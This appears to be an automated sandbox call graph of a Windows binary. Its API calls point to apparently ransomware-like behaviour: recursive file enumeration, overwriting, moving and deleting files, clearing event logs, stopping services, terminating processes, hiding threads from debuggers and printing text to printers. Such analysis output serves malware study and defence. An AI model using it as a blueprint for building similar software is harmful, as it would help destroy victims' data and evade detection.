10243->10231 10245 d0a0b5 10244->10245 10246 d0a095 FindClose 10244->10246 10245->10165 10245->10172 10246->10245 10248 d06912 10247->10248 10249 d06929 10248->10249 10250 d06830 RtlAllocateHeap 10248->10250 10249->10194 10249->10206 10250->10249 10252 d0c349 10251->10252 10253 d0c219 10251->10253 10252->10206 10254 d0c251 WriteFile 10253->10254 10255 d0c276 NtClose 10254->10255 10256 d0c288 WriteFile 10254->10256 10255->10206 10257 d0c2c1 WriteFile 10256->10257 10258 d0c2af 10256->10258 10259 d0c2e6 10257->10259 10260 d0c2f8 WriteFile 10257->10260 10258->10206 10259->10206 10260->10253 10261 d0c31f 10260->10261 10261->10206 10263 d0e321 SetFileAttributesW CreateFileW 10262->10263 10265 d0e367 10263->10265 10266 d0e34f 10263->10266 10265->10218 10267 d0e3b8 SetFileAttributesW CreateFileW 10265->10267 10266->10263 10266->10265 10303 d0dda4 10266->10303 10268 d0e3f8 SetFilePointerEx 10267->10268 10269 d0e464 10267->10269 10268->10269 10270 d0e417 ReadFile 10268->10270 10269->10221 10270->10269 10271 d0e436 10270->10271 10272 d0e2ac RtlAllocateHeap 10271->10272 10273 d0e447 10272->10273 10273->10269 10274 d0684c RtlFreeHeap 10273->10274 10274->10269 10276 d0ecbc 10275->10276 10277 d0eced 10276->10277 10278 d0e214 2 API calls 10276->10278 10279 d06830 RtlAllocateHeap 10277->10279 10278->10277 10286 d0ecf9 10279->10286 10280 d0ee95 10281 d0eea3 10280->10281 10283 d0684c RtlFreeHeap 10280->10283 10284 d0eeb1 10281->10284 10285 d0684c RtlFreeHeap 10281->10285 10282 d0684c RtlFreeHeap 10282->10280 10283->10281 10284->10231 10284->10239 10285->10284 10287 d06830 RtlAllocateHeap 10286->10287 10294 d0ee40 10286->10294 10288 d0ed56 10287->10288 10289 d06830 RtlAllocateHeap 10288->10289 10288->10294 10290 d0ed85 10289->10290 10291 d06830 RtlAllocateHeap 10290->10291 10290->10294 10292 d0ee37 10291->10292 10293 d0684c RtlFreeHeap 10292->10293 10292->10294 10293->10294 10294->10280 10294->10282 10296 d0eb69 10295->10296 10297 d068fc RtlAllocateHeap 10296->10297 10298 d0eb75 10297->10298 10298->10233 10300 d0ec4e 10299->10300 10301 d068fc RtlAllocateHeap 10300->10301 10302 d0ec5d 10301->10302 10302->10233 10304 d0ddaf 10303->10304 10305 d0ddbc 10304->10305 10309 d0dc40 10304->10309 10307 d0ddc2 Sleep 10305->10307 10308 d0ddcd 10305->10308 10307->10308 10308->10266 10312 d0dc77 10309->10312 10310 d0dd4c 10311 d0dd99 10310->10311 10313 d0684c RtlFreeHeap 10310->10313 10311->10305 10312->10310 10314 d06830 RtlAllocateHeap 10312->10314 10313->10311 10315 d0dcd0 10314->10315 10315->10310 10316 d06868 RtlReAllocateHeap 10315->10316 10317 d0dcf9 10315->10317 10316->10315 10317->10310 10319 d0dbbc NtTerminateProcess 10317->10319 10320 d0daec 10317->10320 10319->10317 10321 d0db0c 10320->10321 10322 d0db89 10321->10322 10323 d0dbbc NtTerminateProcess 10321->10323 10322->10317 10323->10322 10325 d0f96e 10324->10325 10327 d0f7c5 10324->10327 10325->10014 10325->10022 10326 d06830 RtlAllocateHeap 10326->10327 10327->10326 10328 d0f84a 10327->10328 10328->10325 10329 d06830 RtlAllocateHeap 10328->10329 10329->10328 10331 d069c1 10330->10331 10332 d06830 RtlAllocateHeap 10331->10332 10333 d069e1 10332->10333 10333->10031 10335 d06830 RtlAllocateHeap 10334->10335 10336 d138c7 10335->10336 10336->10044 10339 d0ce54 10337->10339 10338 d0ced9 10338->10056 10339->10338 10340 d06830 RtlAllocateHeap 10339->10340 10340->10338 10342 d0cf80 10341->10342 10344 d0cf7b 10341->10344 10343 d06830 RtlAllocateHeap 10342->10343 10342->10344 10352 d0cfc1 10343->10352 10345 d0d3ba 10344->10345 10347 d0684c RtlFreeHeap 10344->10347 10346 d0d3c8 10345->10346 10348 d0684c RtlFreeHeap 10345->10348 10349 d0d3d6 10346->10349 10350 d0684c RtlFreeHeap 10346->10350 10347->10345 10348->10346 10351 d0d3e4 10349->10351 10353 d0684c RtlFreeHeap 10349->10353 10350->10349 10354 d0d3f2 10351->10354 10356 d0684c RtlFreeHeap 10351->10356 10352->10344 10368 d0d5d8 10352->10368 10353->10351 10357 d0d400 10354->10357 10359 d0684c RtlFreeHeap 10354->10359 10356->10354 10357->10055 10358 d0cfea 10358->10344 10372 d0d40c 10358->10372 10359->10357 10361 d0cffd 10361->10344 10376 d0d594 10361->10376 10364 d06db0 RtlAllocateHeap 10365 d0d028 10364->10365 10365->10344 10366 d06830 RtlAllocateHeap 10365->10366 10367 d0684c RtlFreeHeap 10365->10367 10366->10365 10367->10365 10369 d0d603 10368->10369 10370 d06830 RtlAllocateHeap 10369->10370 10371 d0d700 10370->10371 10371->10358 10373 d0d49c 10372->10373 10374 d06830 RtlAllocateHeap 10373->10374 10375 d0d4da 10374->10375 10375->10361 10377 d0d5b3 10376->10377 10378 d06db0 RtlAllocateHeap 10377->10378 10379 d0d010 10378->10379 10379->10344 10379->10364 10381 d06c83 10380->10381 10382 d0684c RtlFreeHeap 10381->10382 10383 d06cec 10381->10383 10382->10383 10383->10089 10385 d0c841 10384->10385 10386 d06830 RtlAllocateHeap 10385->10386 10388 d0c851 10386->10388 10387 d0c873 10387->10095 10388->10387 10389 d0684c RtlFreeHeap 10388->10389 10389->10387 10391 d06830 RtlAllocateHeap 10390->10391 10392 d1182a 10391->10392 10392->10106 10394 d06830 RtlAllocateHeap 10393->10394 10395 d11baa 10394->10395 10395->10116 10397 d06db0 RtlAllocateHeap 10396->10397 10398 d0bfdc 10397->10398 10399 d0c0c7 10398->10399 10401 d06830 RtlAllocateHeap 10398->10401 10400 d0c0d5 10399->10400 10403 d0684c RtlFreeHeap 10399->10403 10402 d0c0e3 10400->10402 10404 d0684c RtlFreeHeap 10400->10404 10407 d0bff3 10401->10407 10405 d0c0f1 10402->10405 10406 d0684c RtlFreeHeap 10402->10406 10403->10400 10404->10402 10406->10405 10407->10399 10408 d0684c RtlFreeHeap 10407->10408 10409 d0c021 10408->10409 10410 d06830 RtlAllocateHeap 10409->10410 10411 d0c031 10410->10411 10411->10399 10412 d06eac 2 API calls 10411->10412 10413 d0c047 10412->10413 10414 d0684c RtlFreeHeap 10413->10414 10415 d0c064 10414->10415 10460 d0bef0 10415->10460 10418 d0c0a6 10420 d0bef0 6 API calls 10418->10420 10419 d0b390 2 API calls 10419->10418 10421 d0c0b1 10420->10421 10422 d0bef0 6 API calls 10421->10422 10423 d0c0bc 10422->10423 10424 d0bef0 6 API calls 10423->10424 10424->10399 10426 d07e30 10425->10426 10427 d06830 RtlAllocateHeap 10426->10427 10428 d07e42 NtQuerySystemInformation 10426->10428 10429 d0684c RtlFreeHeap 10426->10429 10430 d06868 RtlReAllocateHeap 10426->10430 10431 d0684c RtlFreeHeap 10426->10431 10427->10426 10428->10426 10429->10426 10430->10426 10432 d07f10 Sleep 10431->10432 10432->10426 10487 d09198 10433->10487 10435 d095fd 10436 d0960c 10435->10436 10504 d0908c 10435->10504 10439 d097a8 4 API calls 10438->10439 10440 d08f70 10439->10440 10441 d09850 NtClose 10440->10441 10442 d08fe0 10440->10442 10444 d08f7e 10441->10444 10443 d09005 10442->10443 10529 d08e9c 10442->10529 10444->10442 10446 d08f87 NtSetInformationThread 10444->10446 10446->10442 10447 d08f9b 10446->10447 10516 d08d78 10447->10516 10450 d09850 NtClose 10451 d08fbe 10450->10451 10451->10442 10523 d08bb0 10451->10523 10454 d07483 10453->10454 10455 d0745b 10453->10455 10455->10454 10456 d07464 GetDriveTypeW 10455->10456 10532 d0748c 10455->10532 10456->10455 10459 d07831 10458->10459 10461 d0bf15 10460->10461 10462 d0bfab 10461->10462 10463 d06830 RtlAllocateHeap 10461->10463 10464 d0bfb9 10462->10464 10466 d0684c RtlFreeHeap 10462->10466 10465 d0bf27 10463->10465 10464->10418 10464->10419 10465->10462 10469 d0be2c 10465->10469 10474 d0bb94 10465->10474 10466->10464 10470 d068fc RtlAllocateHeap 10469->10470 10473 d0be48 10470->10473 10471 d0bee6 10471->10465 10472 d0684c RtlFreeHeap 10472->10471 10473->10471 10473->10472 10475 d0bbbc 10474->10475 10476 d0bbc0 10475->10476 10477 d06830 RtlAllocateHeap 10475->10477 10478 d0be14 10476->10478 10479 d0684c RtlFreeHeap 10476->10479 10480 d0bbe9 10477->10480 10478->10465 10479->10478 10480->10476 10481 d0bc3c CreateDCW 10480->10481 10481->10476 10482 d0bc59 10481->10482 10483 d0bcfa StartDocW 10482->10483 10483->10476 10484 d0bd2a 10483->10484 10484->10476 10485 d0bd74 DrawTextA 10484->10485 10486 d0bdb6 EndPage 10485->10486 10486->10476 10486->10484 10488 d09279 10487->10488 10489 d0943d RegCreateKeyExW 10488->10489 10490 d09471 RegEnumKeyW 10489->10490 10491 d09497 RegCreateKeyExW 10489->10491 10490->10491 10494 d0949c RegCreateKeyExW 10490->10494 10498 d095b2 10491->10498 10500 d0958c RegEnumKeyW 10491->10500 10494->10490 10495 d094ca RegSetValueExW 10494->10495 10495->10490 10497 d094ec RegSetValueExW 10495->10497 10497->10490 10502 d0950a OpenEventLogW 10497->10502 10498->10435 10499 d095b4 OpenEventLogW 10499->10500 10501 d095cc ClearEventLogW 10499->10501 10500->10498 10500->10499 10501->10500 10502->10490 10503 d09522 ClearEventLogW CloseEventLog 10502->10503 10503->10490 10511 d0900c RtlAdjustPrivilege 10504->10511 10506 d09185 10506->10436 10507 d0917c CloseServiceHandle 10507->10506 10508 d090a5 10509 d09164 10508->10509 10510 d0dbbc NtTerminateProcess 10508->10510 10509->10506 10509->10507 10510->10509 10512 d097a8 4 API calls 10511->10512 10513 d09044 10512->10513 10514 d09052 10513->10514 10515 d09850 NtClose 10513->10515 10514->10508 10515->10514 10517 d097a8 4 API calls 10516->10517 10518 d08da3 10517->10518 10519 d08db0 OpenSCManagerW 10518->10519 10522 d08e33 10518->10522 10520 d08dc9 10519->10520 10519->10522 10520->10520 10521 d08e1b OpenServiceW 10520->10521 10521->10522 10522->10442 10522->10450 10524 d08be1 10523->10524 10526 d06830 RtlAllocateHeap 10524->10526 10528 d08c1d 10524->10528 10525 d08d6c 10525->10442 10526->10528 10527 d0684c RtlFreeHeap 10527->10525 10528->10525 10528->10527 10530 d097a8 4 API calls 10529->10530 10531 d08eb5 10530->10531 10531->10443 10540 d07560 10532->10540 10534 d074a4 10535 d074d6 FindFirstFileExW 10534->10535 10537 d07550 10534->10537 10535->10537 10538 d074fe 10535->10538 10536 d0753c FindNextFileW 10536->10537 10536->10538 10537->10455 10538->10536 10546 d0763c 10538->10546 10541 d07580 FindFirstFileExW 10540->10541 10543 d07632 10541->10543 10544 d075de FindClose 10541->10544 10543->10534 10544->10543 10547 d0765e 10546->10547 10548 d077f2 10547->10548 10549 d06830 RtlAllocateHeap 10547->10549 10548->10536 10554 d07676 10549->10554 10550 d077d6 10551 d077e4 10550->10551 10552 d0684c RtlFreeHeap 10550->10552 10551->10548 10553 d0684c RtlFreeHeap 10551->10553 10552->10551 10553->10548 10554->10550 10555 d076ae FindFirstFileExW 10554->10555 10555->10550 10559 d076d6 10555->10559 10556 d077b5 FindNextFileW 10557 d077cd FindClose 10556->10557 10556->10559 10557->10550 10558 d06830 RtlAllocateHeap 10558->10559 10559->10556 10559->10558 10560 d07750 GetFileAttributesW 10559->10560 10562 d0684c RtlFreeHeap 10559->10562 10563 d0763c 12 API calls 10559->10563 10564 d06654 10559->10564 10560->10559 10562->10559 10563->10559 10565 d0666a 10564->10565 10565->10565 10566 d0a064 2 API calls 10565->10566 10567 d06681 10566->10567 10568 d06691 CreateFileW 10567->10568 10569 d06791 10567->10569 10568->10569 10572 d066b9 10568->10572 10571 d067c0 NtFreeVirtualMemory 10569->10571 10573 d067e5 10569->10573 10570 d066be NtAllocateVirtualMemory 10570->10572 10581 d066ef 10570->10581 10571->10569 10572->10570 10572->10581 10574 d067f4 10573->10574 10575 d067eb NtClose 10573->10575 10584 d06544 10574->10584 10575->10574 10578 d0674f WriteFile 10578->10581 10582 d06769 SetFilePointerEx 10578->10582 10579 d0680d 10580 d06822 10579->10580 10583 d0684c RtlFreeHeap 10579->10583 10580->10559 10581->10569 10581->10578 10582->10578 10582->10581 10583->10580 10585 d068fc RtlAllocateHeap 10584->10585 10586 d0655e 10585->10586 10587 d06567 10586->10587 10588 d068fc RtlAllocateHeap 10586->10588 10589 d0660c DeleteFileW 10587->10589 10590 d0684c RtlFreeHeap 10587->10590 10591 d06576 10588->10591 10589->10579 10590->10589 10591->10587 10592 d065cd MoveFileExW 10591->10592 10592->10587 10592->10591 10644 d0f4f8 10593->10644 10596 d0f4f8 2 API calls 10597 d0ffdc 10596->10597 10599 d10004 10597->10599 10604 d0f4f8 2 API calls 10597->10604 10598 d1026f 10601 d1027d 10598->10601 10605 d0684c RtlFreeHeap 10598->10605 10603 d06830 RtlAllocateHeap 10599->10603 10615 d1002d 10599->10615 10600 d0684c RtlFreeHeap 10600->10598 10602 d1028b 10601->10602 10606 d0684c RtlFreeHeap 10601->10606 10602->9382 10607 d10024 10603->10607 10604->10599 10605->10601 10606->10602 10608 d06830 RtlAllocateHeap 10607->10608 10607->10615 10609 d1003f 10608->10609 10610 d0e144 8 API calls 10609->10610 10609->10615 10611 d10052 10610->10611 10612 d069a8 RtlAllocateHeap 10611->10612 10613 d101e9 10611->10613 10616 d0f634 NtSetInformationThread NtClose 10611->10616 10617 d0b390 2 API calls 10611->10617 10618 d0684c RtlFreeHeap 10611->10618 10612->10611 10614 d0684c RtlFreeHeap 10613->10614 10613->10615 10614->10615 10615->10598 10615->10600 10616->10611 10617->10611 10618->10611 10620 d07403 10619->10620 10621 d068fc RtlAllocateHeap 10620->10621 10623 d07411 10621->10623 10622 d07434 10622->9787 10623->10622 10624 d0684c RtlFreeHeap 10623->10624 10624->10622 10626 d0a953 10625->10626 10627 d0a458 6 API calls 10626->10627 10629 d0a96a 10627->10629 10628 d0a999 10628->9787 10629->10628 10630 d06830 RtlAllocateHeap 10629->10630 10630->10628 10632 d0a3cf 10631->10632 10633 d0a3e9 10632->10633 10634 d0b390 2 API calls 10632->10634 10633->9769 10633->9778 10634->10633 10636 d06a55 10635->10636 10637 d06830 RtlAllocateHeap 10636->10637 10638 d06a6b 10636->10638 10637->10638 10638->9783 10640 d0e144 8 API calls 10639->10640 10641 d108d3 10640->10641 10642 d10924 10641->10642 10643 d0b390 2 API calls 10641->10643 10642->9742 10643->10642 10645 d0f552 10644->10645 10646 d0b390 2 API calls 10645->10646 10647 d0f56c 10645->10647 10646->10647 10647->10596 10647->10599 10649 d10da4 10648->10649 10650 d10de9 10648->10650 10651 d0c820 2 API calls 10649->10651 10650->9803 10654 d1135c 10650->10654 10652 d10da9 10651->10652 10652->10650 10653 d0684c RtlFreeHeap 10652->10653 10653->10650 10706 d1119c 10654->10706 10656 d1139d 10657 d06db0 RtlAllocateHeap 10656->10657 10682 d113a1 10656->10682 10663 d113b0 10657->10663 10658 d1153c 10660 d1154a 10658->10660 10661 d0684c RtlFreeHeap 10658->10661 10659 d0684c RtlFreeHeap 10659->10658 10662 d11558 10660->10662 10665 d0684c RtlFreeHeap 10660->10665 10661->10660 10664 d11566 10662->10664 10666 d0684c RtlFreeHeap 10662->10666 10663->10682 10728 d1156d 10663->10728 10664->9803 10683 d116bc 10664->10683 10665->10662 10666->10664 10669 d06db0 RtlAllocateHeap 10670 d113f7 10669->10670 10671 d1156d RtlFreeHeap 10670->10671 10670->10682 10672 d11430 10671->10672 10673 d06db0 RtlAllocateHeap 10672->10673 10674 d1143a 10673->10674 10675 d1156d RtlFreeHeap 10674->10675 10674->10682 10676 d1147d 10675->10676 10677 d06db0 RtlAllocateHeap 10676->10677 10678 d11487 10677->10678 10679 d1156d RtlFreeHeap 10678->10679 10678->10682 10680 d114c7 10679->10680 10681 d06db0 RtlAllocateHeap 10680->10681 10681->10682 10682->10658 10682->10659 10684 d06db0 RtlAllocateHeap 10683->10684 10685 d116ed 10684->10685 10690 d11814 RtlAllocateHeap 10685->10690 10693 d116f6 10685->10693 10686 d0684c RtlFreeHeap 10687 d117ec 10686->10687 10688 d117fa 10687->10688 10689 d0684c RtlFreeHeap 10687->10689 10688->9814 10689->10688 10691 d1172a 10690->10691 10692 d06db0 RtlAllocateHeap 10691->10692 10691->10693 10694 d11765 10692->10694 10693->10686 10693->10687 10695 d0684c RtlFreeHeap 10694->10695 10695->10693 10697 d110ec 10696->10697 10698 d06db0 RtlAllocateHeap 10697->10698 10705 d110f1 10697->10705 10703 d110fd 10698->10703 10699 d11175 10701 d0684c RtlFreeHeap 10699->10701 10702 d11183 10699->10702 10700 d0684c RtlFreeHeap 10700->10699 10701->10702 10702->9817 10704 d06db0 RtlAllocateHeap 10703->10704 10703->10705 10704->10705 10705->10699 10705->10700 10707 d111cb 10706->10707 10709 d111de 10706->10709 10708 d06db0 RtlAllocateHeap 10707->10708 10707->10709 10710 d111e9 10708->10710 10720 d1126b 10709->10720 10732 d11028 10709->10732 10710->10709 10711 d06db0 RtlAllocateHeap 10710->10711 10712 d11201 10711->10712 10712->10709 10715 d11210 10712->10715 10714 d11292 10716 d068fc RtlAllocateHeap 10714->10716 10717 d06db0 RtlAllocateHeap 10715->10717 10718 d112a1 10716->10718 10719 d11219 10717->10719 10718->10720 10721 d068fc RtlAllocateHeap 10718->10721 10719->10656 10720->10656 10722 d112d3 10721->10722 10722->10720 10723 d11319 10722->10723 10725 d0684c RtlFreeHeap 10722->10725 10724 d11327 10723->10724 10726 d0684c RtlFreeHeap 10723->10726 10724->10720 10727 d0684c RtlFreeHeap 10724->10727 10725->10723 10726->10724 10727->10720 10729 d11573 10728->10729 10730 d113ed 10728->10730 10731 d0684c RtlFreeHeap 10729->10731 10730->10669 10731->10730 10733 d06830 RtlAllocateHeap 10732->10733 10734 d1103e 10733->10734 10734->10714 10736 d11b4b 10735->10736 10739 d11aac 10736->10739 10738 d11b63 10738->9822 10740 d06830 RtlAllocateHeap 10739->10740 10741 d11ac3 10740->10741 10742 d11af9 10741->10742 10743 d06868 RtlReAllocateHeap 10741->10743 10745 d11adc 10741->10745 10744 d0684c RtlFreeHeap 10742->10744 10743->10741 10744->10745 10745->10738 10746 d0684c RtlFreeHeap 10745->10746 10747 d11b3c 10746->10747 10747->10738 10751 d16412 10748->10751 10749 d1654c 10749->9837 10750 d0684c RtlFreeHeap 10750->10749 10765 d1642a 10751->10765 10800 d16080 10751->10800 10765->10749 10765->10750 10767 d13f00 10766->10767 10770 d13f31 10767->10770 11061 d13cf4 10767->11061 10769 d13fc2 10769->9833 10772 d14464 10769->10772 10770->10769 10771 d0684c RtlFreeHeap 10770->10771 10771->10769 10773 d1448a 10772->10773 10791 d1448e 10773->10791 11064 d12a54 10773->11064 10775 d145e0 10778 d145ee 10775->10778 10780 d0684c RtlFreeHeap 10775->10780 10777 d0684c RtlFreeHeap 10777->10775 10781 d145fc 10778->10781 10783 d0684c RtlFreeHeap 10778->10783 10779 d06830 RtlAllocateHeap 10782 d144af 10779->10782 10780->10778 10781->9843 10792 d14604 10781->10792 10784 d09610 2 API calls 10782->10784 10782->10791 10783->10781 10785 d144c2 10784->10785 10786 d0f788 2 API calls 10785->10786 10787 d144db 10786->10787 10788 d06830 RtlAllocateHeap 10787->10788 10787->10791 10789 d144f9 10788->10789 10790 d06830 RtlAllocateHeap 10789->10790 10789->10791 10790->10791 10791->10775 10791->10777 10793 d14615 10792->10793 10794 d14816 10793->10794 10795 d09610 2 API calls 10793->10795 10794->9843 10796 d14623 10795->10796 10796->10794 10797 d06db0 RtlAllocateHeap 10796->10797 10799 d1463d 10797->10799 10798 d0684c RtlFreeHeap 10798->10794 10799->10794 10799->10798 11032 d16004 10800->11032 10803 d163ac 10805 d163ba 10803->10805 10806 d0684c RtlFreeHeap 10803->10806 10804 d0684c RtlFreeHeap 10804->10803 10807 d163c8 10805->10807 10808 d0684c RtlFreeHeap 10805->10808 10806->10805 10810 d163d6 10807->10810 10811 d0684c RtlFreeHeap 10807->10811 10808->10807 10809 d163e4 10809->10765 10823 d15c84 10809->10823 10810->10809 10812 d0684c RtlFreeHeap 10810->10812 10811->10810 10812->10809 10813 d06830 RtlAllocateHeap 10815 d16104 10813->10815 10814 d160c8 10814->10803 10814->10804 10815->10814 10816 d06830 RtlAllocateHeap 10815->10816 10817 d161a5 10816->10817 10817->10814 10818 d06830 RtlAllocateHeap 10817->10818 10819 d161f5 10818->10819 10819->10814 10820 d06830 RtlAllocateHeap 10819->10820 10821 d162a0 10820->10821 10821->10814 10822 d0684c RtlFreeHeap 10821->10822 10822->10814 10824 d15ceb 10823->10824 10825 d06db0 RtlAllocateHeap 10824->10825 10826 d15d00 10824->10826 10831 d15d77 10825->10831 10827 d15feb 10826->10827 10828 d0684c RtlFreeHeap 10826->10828 10829 d15ff9 10827->10829 10830 d0684c RtlFreeHeap 10827->10830 10828->10827 10829->10765 10833 d14bbc 10829->10833 10830->10829 10831->10826 10832 d06db0 RtlAllocateHeap 10831->10832 10832->10826 10834 d06830 RtlAllocateHeap 10833->10834 10837 d14bef 10834->10837 10835 d14d77 10838 d0684c RtlFreeHeap 10835->10838 10840 d14d85 10835->10840 10836 d0684c RtlFreeHeap 10836->10835 10841 d06830 RtlAllocateHeap 10837->10841 10845 d14bf8 10837->10845 10838->10840 10839 d14d93 10839->10765 10846 d159e0 10839->10846 10840->10839 10842 d0684c RtlFreeHeap 10840->10842 10843 d14c22 10841->10843 10842->10839 10844 d06830 RtlAllocateHeap 10843->10844 10843->10845 10844->10845 10845->10835 10845->10836 10847 d06830 RtlAllocateHeap 10846->10847 10849 d15a39 10847->10849 10848 d15c06 10851 d15c14 10848->10851 10853 d0684c RtlFreeHeap 10848->10853 10882 d15a42 10849->10882 11038 d148d8 10849->11038 10850 d0684c RtlFreeHeap 10850->10848 10854 d15c22 10851->10854 10856 d0684c RtlFreeHeap 10851->10856 10853->10851 10855 d15c30 10854->10855 10857 d0684c RtlFreeHeap 10854->10857 10858 d15c3e 10855->10858 10859 d0684c RtlFreeHeap 10855->10859 10856->10854 10857->10855 10860 d15c4c 10858->10860 10861 d0684c RtlFreeHeap 10858->10861 10859->10858 10862 d15c5a 10860->10862 10863 d0684c RtlFreeHeap 10860->10863 10861->10860 10864 d15c68 10862->10864 10866 d0684c RtlFreeHeap 10862->10866 10863->10862 10864->10765 10885 d15710 10864->10885 10865 d15a6a 10865->10882 11041 d1498c 10865->11041 10866->10864 10868 d15a96 10869 d0684c RtlFreeHeap 10868->10869 10868->10882 10870 d15ab8 10869->10870 10871 d1498c RtlAllocateHeap 10870->10871 10872 d15ad1 10871->10872 10872->10882 11044 d14a04 10872->11044 10874 d15b19 10874->10882 11047 d14b64 10874->11047 10877 d06830 RtlAllocateHeap 10878 d15b4e 10877->10878 10879 d06db0 RtlAllocateHeap 10878->10879 10878->10882 10880 d15b66 10879->10880 10881 d06830 RtlAllocateHeap 10880->10881 10880->10882 10883 d15b8f 10881->10883 10882->10848 10882->10850 10883->10882 10884 d0684c RtlFreeHeap 10883->10884 10884->10883 10886 d06830 RtlAllocateHeap 10885->10886 10887 d15758 10886->10887 10888 d06830 RtlAllocateHeap 10887->10888 10909 d15761 10887->10909 10899 d15770 10888->10899 10889 d1597e 10891 d1598c 10889->10891 10892 d0684c RtlFreeHeap 10889->10892 10890 d0684c RtlFreeHeap 10890->10889 10893 d1599a 10891->10893 10895 d0684c RtlFreeHeap 10891->10895 10892->10891 10894 d159a8 10893->10894 10896 d0684c RtlFreeHeap 10893->10896 10897 d159b6 10894->10897 10898 d0684c RtlFreeHeap 10894->10898 10895->10893 10896->10894 10897->10765 10910 d14dac 10897->10910 10898->10897 10900 d06830 RtlAllocateHeap 10899->10900 10899->10909 10901 d1589f 10900->10901 10902 d06db0 RtlAllocateHeap 10901->10902 10901->10909 10903 d158b7 10902->10903 10904 d0684c RtlFreeHeap 10903->10904 10903->10909 10905 d15900 10904->10905 10906 d06830 RtlAllocateHeap 10905->10906 10907 d15919 10906->10907 10908 d06db0 RtlAllocateHeap 10907->10908 10907->10909 10908->10909 10909->10889 10909->10890 10911 d06830 RtlAllocateHeap 10910->10911 10912 d14df4 10911->10912 10916 d148d8 RtlAllocateHeap 10912->10916 10946 d14dfd 10912->10946 10913 d0684c RtlFreeHeap 10914 d14fc1 10913->10914 10915 d14fcf 10914->10915 10917 d0684c RtlFreeHeap 10914->10917 10918 d14fdd 10915->10918 10919 d0684c RtlFreeHeap 10915->10919 10929 d14e25 10916->10929 10917->10915 10920 d14feb 10918->10920 10921 d0684c RtlFreeHeap 10918->10921 10919->10918 10922 d14ff9 10920->10922 10923 d0684c RtlFreeHeap 10920->10923 10921->10920 10924 d15007 10922->10924 10925 d0684c RtlFreeHeap 10922->10925 10923->10922 10926 d15015 10924->10926 10927 d0684c RtlFreeHeap 10924->10927 10925->10924 10928 d15023 10926->10928 10930 d0684c RtlFreeHeap 10926->10930 10927->10926 10928->10765 10949 d1503c 10928->10949 10929->10946 11052 d1487c 10929->11052 10930->10928 10932 d14e51 10933 d0684c RtlFreeHeap 10932->10933 10932->10946 10934 d14e73 10933->10934 10935 d1487c RtlAllocateHeap 10934->10935 10936 d14e8c 10935->10936 10937 d14a04 RtlAllocateHeap 10936->10937 10936->10946 10938 d14ed4 10937->10938 10939 d14b64 RtlAllocateHeap 10938->10939 10938->10946 10940 d14ee9 10939->10940 10941 d06830 RtlAllocateHeap 10940->10941 10940->10946 10942 d14f09 10941->10942 10943 d06db0 RtlAllocateHeap 10942->10943 10942->10946 10944 d14f21 10943->10944 10945 d06830 RtlAllocateHeap 10944->10945 10944->10946 10947 d14f4a 10945->10947 10946->10913 10946->10914 10947->10946 10948 d0684c RtlFreeHeap 10947->10948 10948->10947 10950 d06830 RtlAllocateHeap 10949->10950 10960 d1509f 10950->10960 10951 d15677 10953 d15685 10951->10953 10955 d0684c RtlFreeHeap 10951->10955 10952 d0684c RtlFreeHeap 10952->10951 10954 d15693 10953->10954 10956 d0684c RtlFreeHeap 10953->10956 10957 d156a1 10954->10957 10958 d0684c RtlFreeHeap 10954->10958 10955->10953 10956->10954 10959 d156af 10957->10959 10961 d0684c RtlFreeHeap 10957->10961 10958->10957 10962 d156bd 10959->10962 10963 d0684c RtlFreeHeap 10959->10963 10972 d06830 RtlAllocateHeap 10960->10972 11019 d150a8 10960->11019 10961->10959 10964 d156cb 10962->10964 10965 d0684c RtlFreeHeap 10962->10965 10963->10962 10966 d156d9 10964->10966 10967 d0684c RtlFreeHeap 10964->10967 10965->10964 10968 d156e7 10966->10968 10969 d0684c RtlFreeHeap 10966->10969 10967->10966 10970 d156f5 10968->10970 10971 d0684c RtlFreeHeap 10968->10971 10969->10968 10970->10765 10971->10970 10973 d1515b 10972->10973 10974 d148d8 RtlAllocateHeap 10973->10974 10973->11019 10975 d1518c 10974->10975 10975->11019 11055 d14820 10975->11055 10977 d151b8 10978 d0684c RtlFreeHeap 10977->10978 10977->11019 10979 d151da 10978->10979 10980 d14820 RtlAllocateHeap 10979->10980 10981 d151f3 10980->10981 10982 d14a04 RtlAllocateHeap 10981->10982 10981->11019 10983 d1523b 10982->10983 10984 d14b64 RtlAllocateHeap 10983->10984 10983->11019 10985 d15250 10984->10985 10986 d06830 RtlAllocateHeap 10985->10986 10985->11019 10987 d15299 10986->10987 10988 d06db0 RtlAllocateHeap 10987->10988 10987->11019 10989 d152b1 10988->10989 10990 d06830 RtlAllocateHeap 10989->10990 10989->11019 10991 d152dd 10990->10991 10992 d0684c RtlFreeHeap 10991->10992 10991->11019 10993 d15383 10992->10993 10994 d15391 10993->10994 10995 d0684c RtlFreeHeap 10993->10995 10996 d153a6 10994->10996 10998 d0684c RtlFreeHeap 10994->10998 10995->10994 10997 d153bb 10996->10997 10999 d0684c RtlFreeHeap 10996->10999 11000 d153d0 10997->11000 11001 d0684c RtlFreeHeap 10997->11001 10998->10996 10999->10997 11002 d153e5 11000->11002 11003 d0684c RtlFreeHeap 11000->11003 11001->11000 11004 d153fa 11002->11004 11006 d0684c RtlFreeHeap 11002->11006 11003->11002 11005 d1540f 11004->11005 11007 d0684c RtlFreeHeap 11004->11007 11008 d15424 11005->11008 11009 d0684c RtlFreeHeap 11005->11009 11006->11004 11007->11005 11010 d06830 RtlAllocateHeap 11008->11010 11009->11008 11011 d1544b 11010->11011 11012 d148d8 RtlAllocateHeap 11011->11012 11011->11019 11013 d1547c 11012->11013 11013->11019 11058 d1491c 11013->11058 11015 d154a8 11016 d0684c RtlFreeHeap 11015->11016 11015->11019 11017 d154d5 11016->11017 11018 d1491c RtlAllocateHeap 11017->11018 11020 d154e3 11018->11020 11019->10951 11019->10952 11020->11019 11021 d14a04 RtlAllocateHeap 11020->11021 11022 d1552b 11021->11022 11022->11019 11023 d14b64 RtlAllocateHeap 11022->11023 11024 d15540 11023->11024 11024->11019 11025 d06830 RtlAllocateHeap 11024->11025 11026 d155b7 11025->11026 11026->11019 11027 d06db0 RtlAllocateHeap 11026->11027 11028 d155cf 11027->11028 11028->11019 11029 d06830 RtlAllocateHeap 11028->11029 11030 d155f8 11029->11030 11030->11019 11031 d0684c RtlFreeHeap 11030->11031 11031->11019 11033 d16024 11032->11033 11034 d16064 11033->11034 11035 d068fc RtlAllocateHeap 11033->11035 11034->10813 11034->10814 11036 d1604d 11035->11036 11036->11034 11037 d068fc RtlAllocateHeap 11036->11037 11037->11034 11039 d06830 RtlAllocateHeap 11038->11039 11040 d148e1 11039->11040 11040->10865 11042 d06830 RtlAllocateHeap 11041->11042 11043 d14998 11042->11043 11043->10868 11045 d06830 RtlAllocateHeap 11044->11045 